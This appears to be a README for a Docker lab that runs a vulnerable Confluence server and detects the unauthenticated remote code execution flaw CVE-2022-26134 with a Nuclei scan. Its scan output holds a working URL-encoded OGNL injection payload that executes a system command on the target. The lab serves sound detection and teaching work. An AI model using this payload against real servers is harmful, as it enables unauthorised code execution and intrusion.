Detecting CVE-2022-26134 using Nuclei# CVE-2022-26134-LAB
Confluence Server and Confluence Data Center include a significant unauthenticated remote code execution vulnerability identified as CVE-2022-26134, according to a security advisory released by Atlassian on June 2, 2022. The vulnerability was unpatched when it was published on June 2 and was being exploited in the wild. As of June 3, both patches and a temporary workaround are available.
This repository is only intended for experimental and educational purposes.
## Dependencies
* [Docker](https://docs.docker.com/engine/install/)
* [Nuclei](https://nuclei.projectdiscovery.io/nuclei/get-started/#nuclei-installation)
## Vulnerable Confluence Environment
Running the vulnerable environment
```
docker-compose up
```
Once started you can access the confluence server using the following URL address
http://127.0.0.1:8090/
### Setup Confluence Server
1. The first time visiting the site you will be taken through setup.
2. Don't check any boxes and select "Next" on the "Get apps" page.
3. On the license key page click the link that says "Get an evaluation license"
4. You will be redirected to *my.atlassian.com*. Make sure the license type selected is Confluence (Data Center). Type in whatever Organization name you like. Ensure the radio button for "Your instance is" selected is "up and running". Once you verified these details click the button "Generate License".
5. A confirmation modal will pop up asking if you want to install it on the server: 127.0.0.1. Select "Yes"
6. Selecting yes will automatically fill in the license key on your local instance of confluence. Select "Next"
7. Choose "Standalone" deployment type and select "Next"
8. On page for setting up your database the details should be filled in as follows:
- Database type: PostgreSQL
- Setup type: Simple
- Hostname: db
- Port: 5432
- Database name: confluence
- Username: confluence
- Password: 123456789
10. After filling in these fields press the "Test connection" button. You should receive the message "Success! Database connected successfully". Then click "Next".
11. It will begin to setting your database. This can take a little while. hang tight.
12. Once the database setup is complete you will be on the "Load Content" page. Select the "Example Site" button.
13. Next on the "Configure User Management" page select "Manage users and groups with Confluence".
14. Next on the "Configure System Administrator Account" page create and account and select "Next".
15. Once completed you will see the the setup was successful. Press "Start".
16. It will ask you to "Create a space to store your work". Input any Space name you'd like.
17. Skip the tutorial
18. You've now completed the evaluation setup of Confluence Server.
## Detecting CVE-2022-26134
The vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc) or invalid (e.g. “BALH”).
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
### Using Nuclei
Run the following Nuclei command:
```bash
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
```
Scan Output
```bash
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
```
[4.0K] /data/pocs/4cd558d725ee1268336dc8f2486852f6a3444af8
├── [ 477] docker-compose.yaml
└── [3.6K] README.md
0 directories, 2 files